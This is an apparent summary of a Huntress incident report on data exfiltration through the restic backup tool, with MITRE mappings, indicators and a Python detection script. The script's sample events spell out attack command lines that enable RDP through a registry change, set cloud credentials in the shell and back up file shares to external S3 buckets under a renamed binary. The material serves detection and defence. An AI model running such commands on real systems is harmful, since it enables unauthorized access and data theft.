Keypoints
- Initial access to a Windows Server 2019 endpoint was obtained via RDP using previously compromised credentials from an endpoint named “debian”.
- The attacker downloaded a scanner utility (saved as system.exe) and experienced DCOM communication errors while enumerating hosts.
- An archive retrieved from attacker-controlled storage contained restic, which was renamed to dns.exe on one endpoint and executed to target S3-compatible buckets for backup/exfiltration.
- The actor set environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, RESTIC_PASSWORD) and issued repeated restic backup/init commands against Wasabi and Backblaze B2 endpoints.
- Registry modification (reg add) was used to enable RDP on a second endpoint, and the attacker accessed the second host via network logons to run restic there as well.
- Repeated failed attempts to run restic suggest the actor may not have successfully completed exfiltration before both endpoints were isolated.
- IOCs include the NetBIOS name “debian”, S3 endpoints (wasabisys and backblazeb2), and multiple SHA-256 hashes for system.exe and restic variants.
MITRE Techniques
- [T1078.002] Valid Accounts – Use of compromised credentials to authenticate via RDP (‘accessed via RDP, using previously compromised credentials’).
- [T1133] External Remote Services – Remote access via RDP from an external endpoint named “debian” to the Windows Server 2019 host (‘accessed via RDP, using previously compromised credentials, from an endpoint named “debian.”’).
- [T1059.003] Windows Command Shell – Use of cmd.exe to modify the registry to enable RDP (‘cmd.exe /Q /c reg add “HKLM\system\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections …’).
- [T1027] Obfuscated Files or Information – Renaming and bundling of legitimate tools (restic renamed to dns.exe; system.exe) to hide intent (‘downloaded an archive from which they extracted the restic backup application, which they renamed to dns.exe’).
- [T1560.001] Archive via Utility – Use of a backup utility (restic) to package data for exfiltration (‘restic.exe -r s3:… backup “”’).
- [T1039] Data from Network Shared Drive – Targeting of file shares for backup/exfiltration (‘backup “”’ and ‘backup “”’).
- [T1567] Exfiltration to Cloud Storage – Directing backups to S3-compatible cloud storage endpoints (Wasabi, Backblaze B2) as the exfiltration channel (‘-r s3:https://s3.us-central-1.wasabisys[.]com/… init’).
Indicators of Compromise
- [NetBIOS name] threat actor endpoint – debian (used as the origin for RDP access)
- [Domains] exfiltration endpoints – s3.us-central-1.wasabisys[.]com, s3.us-east-005.backblazeb2[.]com
- [File names] downloaded/renamed tools – system.exe (scanner utility), dns.exe (restic renamed)
- [File hashes] malicious binaries – system.exe SHA-256: 6c176e9c2a7eaf4e…b57f8; restic/dns.exe SHA-256: 98394683d8f30ce9…cdc1d; restic.exe SHA-256: 75d4148e…35cac
Huntress observed the technical workflow beginning with RDP access using compromised credentials from an endpoint labeled “debian.” The attacker performed light discovery (viewing individual text/CSV/PDF files), downloaded a scanner utility (saved as system.exe), and encountered DCOM communication errors while probing the network. They retrieved an archive from cloud storage, extracted restic, and in one case renamed it to dns.exe for execution.
The adversary then attempted to exfiltrate data by running restic commands targeting S3-compatible buckets (Wasabi and Backblaze B2), setting environment variables for AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and RESTIC_PASSWORD prior to execution. Commands observed included restic backup operations against specific shares and an init against a Wasabi endpoint; multiple repeated attempts and changing credentials suggest authentication or configuration issues prevented a successful run.
To expand access, the attacker enabled RDP on a second host via a registry modification (reg add) and used network logons to launch restic there as well. Containment actions isolated both endpoints before successful exfiltration was observed; no additional persistence mechanisms (RMM installation or account creation) were detected in the timeline.
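The two behaviours described above (restic driven at S3-compatible storage under a renamed binary with credentials set in the shell, and RDP enabled through a reg add on fDenyTSConnections) are both visible in process-creation command lines. The following detection sketch is an added example written for this summary; it is not Huntress code and not telemetry from the incident. The event records, hostnames, bucket names and key values are constructed, and the S3 endpoint hosts in IOC_S3_HOSTS come from the indicator list above. A legitimate restic backup to an internal repository is included so the rules can be seen to ignore it.

```python
import ntpath
import re

# Hostnames taken from the report's IoC list (wasabisys / backblazeb2 S3 endpoints).
IOC_S3_HOSTS = ("wasabisys.com", "backblazeb2.com")
# restic subcommands that read or write a repository.
RESTIC_SUBCOMMANDS = {"backup", "init", "snapshots", "restore", "check"}
# Variables the actor set before running restic, per the report.
SECRET_ENV_VARS = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "RESTIC_PASSWORD")

# reg add against the Terminal Server key setting fDenyTSConnections to 0 (RDP enabled).
RDP_ENABLE_RE = re.compile(
    r'reg(\.exe)?\s+add\s+"?HKLM\\system\\CurrentControlSet\\Control\\Terminal Server"?'
    r'.*?/v\s+fDenyTSConnections.*?/d\s+0\b',
    re.IGNORECASE,
)

# Constructed process-creation records (assumed field names; not real telemetry).
SAMPLE_EVENTS = [
    {"host": "SRV01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /Q /c reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"host": "SRV01", "image": r"C:\Users\Public\dns.exe",
     "cmdline": r'dns.exe -r s3:https://s3.us-central-1.wasabisys.com/example-bucket init'},
    {"host": "SRV02", "image": r"C:\Users\Public\restic.exe",
     "cmdline": r'restic.exe -r s3:https://s3.us-east-005.backblazeb2.com/example-bucket backup "\\FILESRV\Finance"'},
    {"host": "SRV01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c set AWS_ACCESS_KEY_ID=AKIAEXAMPLE && set RESTIC_PASSWORD=example && dns.exe -r s3:https://s3.us-central-1.wasabisys.com/example-bucket backup "\\FILESRV\HR"'},
    # Legitimate-looking internal backup: restic under its own name to a UNC repository.
    {"host": "SRV03", "image": r"C:\Program Files\Backup\restic.exe",
     "cmdline": r'restic.exe -r \\backupsrv\repo backup C:\Data'},
    {"host": "SRV03", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c dir C:\Users'},
]


def restic_invocation(tokens):
    """Return (program, repository, subcommand) if the tokens look like a restic call, else None.

    The program is whatever token precedes -r/--repo, so a renamed binary is still caught.
    """
    for i, tok in enumerate(tokens):
        if tok in ("-r", "--repo") and i > 0 and i + 1 < len(tokens):
            program = ntpath.basename(tokens[i - 1].strip('"')).lower()
            repo = tokens[i + 1].strip('"')
            sub = next((t.lower() for t in tokens[i + 2:] if t.lower() in RESTIC_SUBCOMMANDS), None)
            if sub:
                return program, repo, sub
    return None


def classify(event):
    """Return the list of finding labels raised by one process-creation record."""
    cmd = event["cmdline"]
    findings = []

    if RDP_ENABLE_RE.search(cmd):
        findings.append("rdp_enabled_via_registry")

    # Credentials for the repository passed through cmd.exe 'set' (PowerShell $env: is not covered here).
    if any(re.search(rf"\bset\s+{v}=", cmd, re.IGNORECASE) for v in SECRET_ENV_VARS):
        findings.append("credentials_set_in_shell")

    hit = restic_invocation(cmd.split())
    if hit:
        program, repo, sub = hit
        repo_l = repo.lower()
        if repo_l.startswith("s3:"):
            findings.append(f"restic_{sub}_to_s3")
        if any(h in repo_l for h in IOC_S3_HOSTS):
            findings.append("ioc_s3_endpoint_match")
        if program not in ("restic.exe", "restic"):
            findings.append("restic_under_renamed_binary")
    return findings


def triage(events):
    """Group findings per host; hosts with no findings are omitted."""
    by_host = {}
    for ev in events:
        found = classify(ev)
        if found:
            by_host.setdefault(ev["host"], set()).update(found)
    return {h: sorted(f) for h, f in by_host.items()}


if __name__ == "__main__":
    for host, findings in triage(SAMPLE_EVENTS).items():
        print(host, ", ".join(findings))
```

On the constructed sample, SRV01 accumulates the registry change, the shell-set credentials and restic running as dns.exe against a Wasabi endpoint; SRV02 shows only the S3 backup to a Backblaze endpoint; SRV03, which runs restic under its own name to an internal UNC repository, raises nothing. Keying on the repository argument and the program that precedes it, rather than on the image name, is what keeps the renamed copy in view.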
Read more: https://www.huntress.com/blog/using-backup-utilities-for-data-exfiltration